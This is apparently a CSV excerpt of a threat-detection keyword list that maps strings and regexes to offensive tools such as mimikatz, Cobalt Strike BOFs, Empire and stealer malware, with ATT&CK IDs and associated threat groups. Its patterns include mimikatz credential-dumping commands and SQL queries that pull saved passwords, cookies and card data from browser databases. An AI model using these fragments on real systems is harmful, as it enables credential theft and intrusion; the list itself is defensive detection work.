"*sekurlsa::tspkg*",".{0,1000}sekurlsa\:\:tspkg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58360"
"*sekurlsa::wdigest*",".{0,1000}sekurlsa\:\:wdigest.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58361"
"*SELECT * FROM EvilSignature*",".{0,1000}SELECT\s.{0,1000}\sFROM\sEvilSignature.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","0","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","58362"
"*SELECT * FROM EvilSignature*",".{0,1000}SELECT\s.{0,1000}\sFROM\sEvilSignature.{0,1000}","offensive_tool_keyword","EternalHushFramework","EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems","T1071.001 - T1132.001 - T1059.003 - T1547.001","TA0011 - TA0005 - TA0010 - TA0002","N/A","Equation Group","C2","https://github.com/APT64/EternalHushFramework","1","0","N/A","N/A","10","10","11","1","2023-10-28T13:08:06Z","2023-07-09T09:13:21Z","58363"
"*SELECT * from smbsr WHERE *",".{0,1000}SELECT\s.{0,1000}\sfrom\ssmbsr\sWHERE\s.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","58364"
"*SELECT * FROM Win32_GroupUser WHERE GroupComponent=Win32_Group.Domain=VARIABLE,Name='Administrators'*",".{0,1000}SELECT\s.{0,1000}\sFROM\sWin32_GroupUser\sWHERE\sGroupComponent\=Win32_Group\.Domain\=VARIABLE,Name\=\'Administrators\'.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","N/A","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","58365"
"*SELECT action_url, username_value, password_value FROM logins'*",".{0,1000}SELECT\saction_url,\susername_value,\spassword_value\sFROM\slogins\'.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","58366"
"*SELECT displayName FROM AntiVirusProduct*",".{0,1000}SELECT\sdisplayName\sFROM\sAntiVirusProduct.{0,1000}","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","N/A","10","10","55","4","2024-11-01T00:20:02Z","2023-04-19T10:59:30Z","58367"
"*SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies*",".{0,1000}SELECT\shost_key,\sname,\spath,\sencrypted_value,\sexpires_utc\sFROM\scookies.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","58368"
"*SELECT host_key, name, path, encrypted_value, expires_utc FROM cookies*",".{0,1000}SELECT\shost_key,\sname,\spath,\sencrypted_value,\sexpires_utc\sFROM\scookies.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","58369"
"*SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards*",".{0,1000}SELECT\sname_on_card,\sexpiration_month,\sexpiration_year,\scard_number_encrypted\sFROM\scredit_cards.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","58370"
"*SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards*",".{0,1000}SELECT\sname_on_card,\sexpiration_month,\sexpiration_year,\scard_number_encrypted\sFROM\scredit_cards.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","58371"
"*SELECT origin_url, username_value, password_value FROM logins*",".{0,1000}SELECT\sorigin_url,\susername_value,\spassword_value\sFROM\slogins.{0,1000}","offensive_tool_keyword","Blank-Grabber","Stealer with multiple functions","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Blank-c/Blank-Grabber","1","0","N/A","N/A","10","9","831","220","2023-08-06T06:26:16Z","2022-01-26T12:04:56Z","58372"
"*SELECT origin_url, username_value, password_value FROM logins*",".{0,1000}SELECT\sorigin_url,\susername_value,\spassword_value\sFROM\slogins.{0,1000}","offensive_tool_keyword","Luna-Grabber","discord token grabber made in python","T1003 - T1056","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Smug246/Luna-Grabber","1","0","N/A","N/A","10","","N/A","","","","58373"
"*SELECT SYSTEM_USER as 'Logged in as'* CURRENT_USER as 'Mapped as'*",".{0,1000}SELECT\sSYSTEM_USER\sas\s\'Logged\sin\sas\'.{0,1000}\sCURRENT_USER\sas\s\'Mapped\sas\'.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","0","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","58374"
"*SELECT user_name, password FROM VeeamBackup.dbo.Credentials*",".{0,1000}SELECT\suser_name,\spassword\sFROM\sVeeamBackup\.dbo\.Credentials.{0,1000}","offensive_tool_keyword","SharpVeeamDecryptor","Decrypt Veeam database passwords","T1555.005 - T1003 - T1059","TA0006 - TA0005 - TA0008","N/A","N/A","Credential Access","https://github.com/S3cur3Th1sSh1t/SharpVeeamDecryptor","1","0","N/A","used by EMBARGO Ransomware","10","2","158","18","2023-11-07T14:00:47Z","2023-11-07T14:00:45Z","58375"
"*SELECT WindowTitle, TimeStamp, ImageToken *FROM WindowCapture*",".{0,1000}SELECT\sWindowTitle,\sTimeStamp,\sImageToken\s.{0,1000}FROM\sWindowCapture.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","58376"
"*Select-String -Path .\nmap_smb.gnmap -Pattern *open*| foreach { echo $_.tostring().split()[1] } > *",".{0,1000}Select\-String\s\-Path\s\.\\nmap_smb\.gnmap\s\-Pattern\s.{0,1000}open.{0,1000}\|\sforeach\s\{\secho\s\$_\.tostring\(\)\.split\(\)\[1\]\s\}\s\>\s.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","N/A","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","58377"
"*self.keylogger_widget*",".{0,1000}self\.keylogger_widget.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","58378"
"*self.sprayer.auth_O365*",".{0,1000}self\.sprayer\.auth_O365.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","N/A","10","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","58379"
"*self_delete.x64.o*",".{0,1000}self_delete\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","N/A","10","10","180","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z","58380"
"*Self_Deletion_BOF*",".{0,1000}Self_Deletion_BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","N/A","10","10","180","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z","58381"
"*-selfdelete.exe -d:selfdelete*",".{0,1000}\-selfdelete\.exe\s\-d\:selfdelete.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","58382"
"*SeManageVolumeExploit.*",".{0,1000}SeManageVolumeExploit\..{0,1000}","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","N/A","10","2","110","17","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z","58383"
"*SeManageVolumeExploit-main",".{0,1000}SeManageVolumeExploit\-main","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","N/A","10","2","110","17","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z","58384"
"*Semperis/GoldenGMSA*",".{0,1000}Semperis\/GoldenGMSA.{0,1000}","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","N/A","7","2","144","22","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z","58385"
"*send \*\[ \\*\$BASH\\* = \\*/bin/bash\\* -o \\*\$SHELL\\* = \\*/bin/bash\\* \]*",".{0,1000}send\s\\.{0,1000}\\\[\s\\\\.{0,1000}\\\$BASH\\\\.{0,1000}\s\=\s\\\\.{0,1000}\/bin\/bash\\\\.{0,1000}\s\-o\s\\\\.{0,1000}\\\$SHELL\\\\.{0,1000}\s\=\s\\\\.{0,1000}\/bin\/bash\\\\.{0,1000}\s\\\].{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","#linux","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z","58386"
"*Send a file via DoH.*",".{0,1000}Send\sa\sfile\svia\sDoH\..{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","58387"
"*send badger response to ratel server and recv the next command*",".{0,1000}send\sbadger\sresponse\sto\sratel\sserver\sand\srecv\sthe\snext\scommand.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","58388"
"*Send me some bitcoins or kebab*",".{0,1000}Send\sme\ssome\sbitcoins\sor\skebab.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","58389"
"*Send the payload with the grooms*",".{0,1000}Send\sthe\spayload\swith\sthe\sgrooms.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58390"
"*send_invoke_shellcode(*ratID*",".{0,1000}send_invoke_shellcode\(.{0,1000}ratID.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","58391"
"*send_ps1_payload*",".{0,1000}send_ps1_payload.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","58392"
"*send_ratcode(ratID=*",".{0,1000}send_ratcode\(ratID\=.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","58393"
"*send_shellcode_msbuild_xml(*ratID*",".{0,1000}send_shellcode_msbuild_xml\(.{0,1000}ratID.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","58394"
"*send_shellcode_via_pipe*",".{0,1000}send_shellcode_via_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","N/A","10","10","118","13","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z","58395"
"*send_shellcode_via_pipe*",".{0,1000}send_shellcode_via_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","N/A","10","10","332","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z","58396"
"*SendBuffer(C2Socket*",".{0,1000}SendBuffer\(C2Socket.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#content","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","58403"
